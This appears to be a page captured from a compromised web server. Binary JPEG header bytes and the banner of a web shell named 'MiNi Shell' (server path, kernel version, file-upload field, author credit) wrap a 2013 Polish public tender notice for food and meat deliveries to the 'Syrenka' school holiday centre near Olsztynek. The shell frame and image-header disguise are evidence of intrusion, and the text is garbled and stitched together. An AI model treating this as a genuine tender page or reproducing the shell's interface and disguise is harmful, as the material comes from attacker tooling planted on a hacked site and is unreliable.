JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130211/55874-N-2013.html

<p class="kh_header"><b>Olsztynek: Sukcesywne dostawy art. spożywczych, mięsa wieprzowo - wołowego, produktów   mięsnych, wędlin, oraz mięsa drobiowego</b><br>
<b>Numer ogłoszenia: 55874 - 2013; data zamieszczenia: 11.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pozaszkolna Placówka Specjalistyczna Szkolny Ośrodek Wypoczynkowy "Syrenka" w Marózie , Maróz 5, 11-015 Olsztynek, woj. warmińsko-mazurskie, tel. 89 513 92 15, faks 89 513 92 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> sowsyrenka.bip.um.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy art. spożywczych, mięsa wieprzowo - wołowego, produktów   mięsnych, wędlin, oraz mięsa drobiowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy żywności okreslonej w V pakietach opisanych szczegółowo w specyfikacji asortymentowej załącznik nr. 4 do SIWZ oraz podano ilościowo w formularzu cenowym załącznik nr. 1A do SIWZ tj.
Pakiet nr.I wędliny wieprzowo-drobiowe,
Pakiet nr.III wędliny drobiowe, 
Pakiet nr. IV Mięso drobiowe,
Pakiet nr.V Art.spożywcze..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.00.00-2, 15.13.00.00-8, 15.13.11.30-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Wykonawca składa oświadczenie zgodne z art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Wykonawca składa oświadczenie zgodne z art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Wykonawca składa oświadczenie zgodne z art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Wykonawca składa oświadczenie zgodne z art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Wykonawca składa oświadczenie zgodne z art.22 ust.1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)formularz OFERTA 
2)FORMULARZ CENOWY -stosownie do złozonego pakietu

3) ważną decyzję o dopuszczeniu samochodu do przewozu żywności HDI (Dz. U z 2003r. Nr 21 poz.179), którym będzie świadczona usługa,
4)oświadczenie, że zakład ma wdrożony system HACCP lub GMP  i GHP;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> sowsyrenka.bip.um.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego Budynek Złota Rybka - sekretariat, lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2013 godzina 09:00, miejsce: Zamawiającego Budynek Złota Rybka - sekretariat, lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kiełbasa jałowcowa	 kg 	50
kiełbasa biała surowa wieprzowa	 kg 	120
kiełbasa biała parzona wieprzowa	 kg 	15
kiełbasa piwna 	 kg 	70
kiełbasa szynkowa 	 kg 	90
kiełbasa krakowska parzona	 kg 	100
kiełbasa krakowska sucha	 kg 	35
kiełbasa żywiecka 	 kg 	60
kiełbasa metka cebulowa	 kg 	5
kiełbasa metka łososiowa	 kg 	5
kiełbasa myśliwska	 kg 	5
kiełbasa salami	 kg 	25
szynka mielona	 kg 	100
szynka konserwowa 	 kg 	50
golonka konserwowa 	 kg 	80
kiełbasa zwyczajna 	 kg 	280
kiełbasa toruńska	 kg 	100
kabanosy	 kg 	10
kiełbasa śląska	 kg 	220
kiełbasa szynkowa wołowa	 kg 	5
polęwica sopocka	 kg 	200
polędwica wieprzowa wędzona	 kg 	100
wędzonka 	kg	50
ogonówka 	 kg 	120
baleron 	 kg 	100
szynka wędz 	 kg 	150
szynka gotowana  	 kg 	50
boczek wędzony parzony b/k	 kg 	150
słonina wędzona	 kg 	2
kaszanka gryczana	 kg 	50
kaszanka jęczmienna	 kg 	80
kiszka ziemniaczana	 kg 	30
salceson włoski	 kg 	20
salceson ozorkowy	 kg 	20
pasztet wieprzowy	 kg 	60
pasztetowa 	 kg 	80
kości schabowe wędzone	 kg 	20
parówki wieprzowe cienkie 	 kg 	220
serdelki wieprzowe	 kg 	220
mortadela 	 kg 	300
pieczeń wieprzowa	kg	40
pieczeń litewska	kg	40
schab pieczony	kg	10
mortadela z przyprawami	 kg 	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> mięso wieprzowo-wołowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> antrykot wołowy b/k	 kg 	10
wołowina zrazowa b/k	 kg 	10
karkówka wieprzowa b/k	 kg 	230
łopatka wieprzowa b/k	 kg 	150
schab z k 	kg	50
schab b/k	 kg 	500
szynka wieprzowa b/k	 kg 	120
mięso  wieprzowe drobne b/k	 kg 	900
żeberka wieprzowe paski	 kg 	180
boczek świeży b/ż	 kg 	170
pachwina	 kg 	5
golonka wp	 kg 	50
kości schabowe 	 kg 	200
słonina	 kg 	60
nogi wieprzowe	 kg 	25
flaki wołowe	kg	50
wątroba wieprzowa	 kg 	80
smalec wieprzowy 	 kg 	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.10.00-9, 15.11.30.00-3, 15.11.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wędliny drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szynka drobiowa	 kg 	80
pierś wędzona z indyka	 kg 	5
pierś wędzona z kurczaka	 kg 	5
polędwica drobiowa	 kg 	80
parówki drobiowe cienkie	 kg 	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z kurczaka b/s	 kg 	280
filet z indyka b/s	 kg 	100
kurczaki 	 kg 	330
skrzydełka z kurczaka 	 kg 	250
udko z kurczaka 	 kg 	350
pałki z kurczaka	 kg 	120
wątróbka z kurczaka	 kg 	10
serca drobiowe	kg	40
żoładki z kurczaka	 kg 	5
filet z kurczaka b/s	 kg 	280
filet z indyka b/s	 kg 	100
kurczaki 	 kg 	330
skrzydełka z kurczaka 	 kg 	250
udko z kurczaka 	 kg 	350
pałki z kurczaka	 kg 	120
wątróbka z kurczaka	 kg 	10
serca drobiowe	kg	40
żoładki z kurczaka	 kg 	5
filet z kurczaka b/s	 kg 	280
filet z indyka b/s	 kg 	100
kurczaki 	 kg 	330
skrzydełka z kurczaka 	 kg 	250
udko z kurczaka 	 kg 	350
pałki z kurczaka	 kg 	120
wątróbka z kurczaka	 kg 	10
serca drobiowe	kg	40
żoładki z kurczaka	 kg 	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.23.00-9, 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Artykuły ogólnospożywcze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowy 	 kg 	30
brzoskwinia konserwowa  	 kg 	20
mandarynka konserwowa 	 kg 	5
rodzynki suszone  	 kg 	15
syrop owocowy 	 kg 	20
rosół z kury 	 kg 	10
bulion grzybowy 	 kg 	3
bulion warzywny 	 kg 	5
bulion wołowy	 kg 	2
sos pieczeniowy  	 kg 	1
sos myśliwski  	 kg 	1
sos ogrodowy,sałatkowy  	 kg 	8
sos słodko kwaśny	 kg 	1
sos z zielonym pieprzem	l	1
sos węgierski	l	1
sos grzybowy	l	12
sos boloński 	l	12
zupa w proszku-żurek 	 kg 	8
barszcz w proszku czerwony	 kg 	25
budyń  	 kg 	15
galaretka owocowa 	 kg 	10
żelatyna spożywcza drobiowa 	 kg 	5
kisiel 	 kg 	15
wiórki kokosowe	 kg 	2
soda 	 kg 	1
cukier waniliowy 	 kg 	5
cynamon mielony 	 kg 	1
drożdże suszone	 kg 	3
gałka muszkatołowa mielona  	 kg 	1
goździk	 kg 	1
kwasek cytrynowy 	 kg 	10
liść laurowy   	 kg 	1
majeranek  	 kg 	3
papryka mielona słodka 	 kg 	10
chilii	 kg 	1
pieprz naturalny mielony 	 kg 	25
proszek do pieczenia 	kg	1
kminek 	 kg 	1
oregano	 kg 	1
owoc jałowca suszony	 kg 	1
przyprawa w płynie	 kg 	15
przyprawa warzywna	 kg 	250
migdały	 kg 	1
pieprz ziołowy	 kg 	1
rozmaryn	 kg 	1
orzechy laskowe	 kg 	1
orzechy włoskie	 kg 	1
imbir mielony	 kg 	1
kolendra	 kg 	1
sezam	 kg 	1
przyprawa do flaków	 kg 	2
przyprawa do drobiu	 kg 	5
przyprawa do ryb	 kg 	1
przyprawa gyros	 kg 	5
przyprawa do mięs	 kg 	5
przyprawa do grila	 kg 	3
przyprawa carry	 kg 	1
przyprawa bazylia	 kg 	1
przyprawa kebab	kg	2
przyprawa do karkówki	kg	3
przyprawa tymianek	 kg 	1
ziele angielskie 	 kg 	2
zioła prowensalskie 	 kg 	1
czosnek granulowany	 kg 	15
cukier biały kryształ 	 kg 	1800
cukier biały kryształ kostka	 kg 	10
cukier biały kryształ saszetka 	 kg 	30
cukier puder  	 kg 	30
kasza gryczana prażona	 kg 	40
kasza jęczmienna  średnia	 kg 	40
kasza jęczmienna  gruba	 kg 	10
kasza manna 	 kg 	30
fasola sucha średnia	 kg 	30
fasola sucha jaś	 kg 	30
groch łuskany połółwki	 kg 	50
makaron  nitki cięte	 kg 	50
makaron  spagetti	 kg 	80
makaron  kolanka	 kg 	50
makaron  świderki	 kg 	40
makaron  muszelki	 kg 	40
makaron  zacierka	 kg 	40
makaron  łazanki	 kg 	50
makaron  wstążki	 kg 	30
makaron  gniazdka	 kg 	30
mąka pszenna  typ 550	 kg 	1700
mąka ziemniaczana  	 kg 	50
płatki kukurydziane 	 kg 	80
płatki zbożowe miodowe	 kg 	20
płatki zbożowe orzechowe	 kg 	20
płatki zbożowe czekoladowe	 kg 	50
płatki owsiane 	 kg 	20
ryż biały  	 kg 	200
ryż ciemny  	 kg 	10
sól kuchenna 	 kg 	300
chrzan tarty w occie	 kg 	25
ćwikła 	 kg 	3
ketchup łagodny pikantny	 kg 	400
ketchup w saszetkach	 kg 	5
musztarda sarepska	 kg 	100
musztarda zwykła	kg	2
musztarda w saszetkach	 kg 	5
fasolka szparagowa konserwowa 	 kg 	30
fasola czerwona konserwowa 	 kg 	15
fasola biała konserwowa 	 kg 	5
groszek konserwowy 	 kg 	50
koncentrat pomidorowy 30%	 kg 	160
ogórek korniszon 	 kg 	450
oliwki konserwowe  	 kg 	10
papryka konserwowa 	 kg 	280
szczaw konserwowy 	 kg 	80
kukurydza konserwowa 	 kg 	70
majonez 	 kg 	220
cebula perłowa w zalewie octowej 	 kg 	3
czosnek marynowany 	 kg 	3
kukurydza konserwowa minikolby 	 kg 	3
pieczarka konserwowa 	 kg 	15
pomidory konserwowe 	 kg 	5
ocet	  l	100
sok pomidorowy	  l 	10
dżem różne smaki 	 kg 	150
dżem w saszetkach 25g (różne smaki)	 kg 	10
powidła ślowkowe	 kg 	30
żurawina	 kg 	3
miód naturalny 	 kg 	15
miód w saszetkach	 kg 	3
olej słonecznikowy     	 l 	1
olej sojowy     	 l 	1
olej rzepakowy 	 l 	1800
oliwa z oliwek 	 l 	3
paprykarz szcz	 kg 	30
konserwa rybna makrela w pomidorach	 kg 	30
konserwa rybna makrelaw oleju	 kg 	30
konserwa rybna szprot w oleju	 kg 	5
konserwa rybna szprot w pomidorach	 kg 	5
konserwa rybna śledź w oleju	 kg 	10
konserwa rybna śledź w pomidorach	 kg 	10
szprot podwędzany w oleju	 kg 	5
tuńczyk sałatkowy	 kg 	10
pasztet z indyka	 kg 	5
łopatka konserwowa	 kg 	5
szynka konserwowa 	 kg 	5
napój owocowy karton 1 l	 l 	1500
sok  owocowykarton 1 l	 l 	30
napój owocowy karton 0,2 l	 l 	80
woda mineralna n/ gaz 1,5 	 l 	1200
woda mineralna  gaz 1,5 	 l 	300
woda mineralna niegaz.  500ml 	 l 	1800
herbata ekspresowa z zawieszką	 kg 	20
herbata expresowa  	 kg 	25
kakao 	 kg 	10
kawa  rozpuszczalna w saszetkach  	 kg 	10
kawa naturalna mielona 	 kg 	35
kawa naturalna rozpuszczalna 	 kg 	12
kawa capucino 	 kg 	1
kawa capucino w saszetkach	 kg 	1
herbatniki	 kg 	80
paluszki słone	 kg 	40
herbatniki w polewie	kg	25
baton  czekooladowy z orzechami 	 kg 	20
baton czekoladowy z karmelem	 kg 	50
baton czekoladowy z nadzieniem mlecznym	 kg 	40
baton czekoladowy z nadzieniem owocowym	 kg 	20
wafel przekładany  w polewie czekoladowej 	 kg 	30
biszkopt oblany z jednej strony galaretką i polewą czekoladową	 kg 	5
wafle kakaowe w polewie luz	 kg 	5
wafle kakaowe bez polewy luz	 kg 	5
pierniki w czekoladzie luz	 kg 	15
markizy luz	 kg 	15
czekolada mleczna tabliczka g	 kg 	5
czekolada nadziewana tabliczka g	 kg 	5
czekolada z bakaliami tabliczka g	 kg 	5
ptasie mleczko smak	 kg 	5
cukierki witaminizowane	 kg 	5
krem czekoladowy	 kg 	50
kotlet sojowy	kg	2
sos sojowy	l	2
chipsy smaki różne 	kg	5
chrupki kukurydziane	kg	10
ciastka zbożowe	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0, 15.32.00.00-7, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com